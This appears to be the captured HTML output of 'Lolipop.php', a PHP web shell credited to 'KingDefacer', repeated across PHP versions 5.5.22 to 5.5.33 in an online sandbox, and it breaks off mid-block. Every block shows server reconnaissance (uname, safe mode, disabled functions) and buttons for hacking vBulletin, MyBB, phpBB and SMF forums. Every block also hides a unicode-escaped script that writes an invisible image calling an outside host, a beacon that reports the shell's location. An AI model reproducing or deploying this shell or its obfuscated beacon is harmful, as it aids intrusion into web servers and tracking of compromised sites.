href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.33
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.33</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.32
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.32</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.31
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.31</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.30
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.30</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.29
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.29</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.28
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.28</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.27
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.27</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.26
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.26</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.25
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.25</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.24
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.24</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.23
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.23</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.22
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : 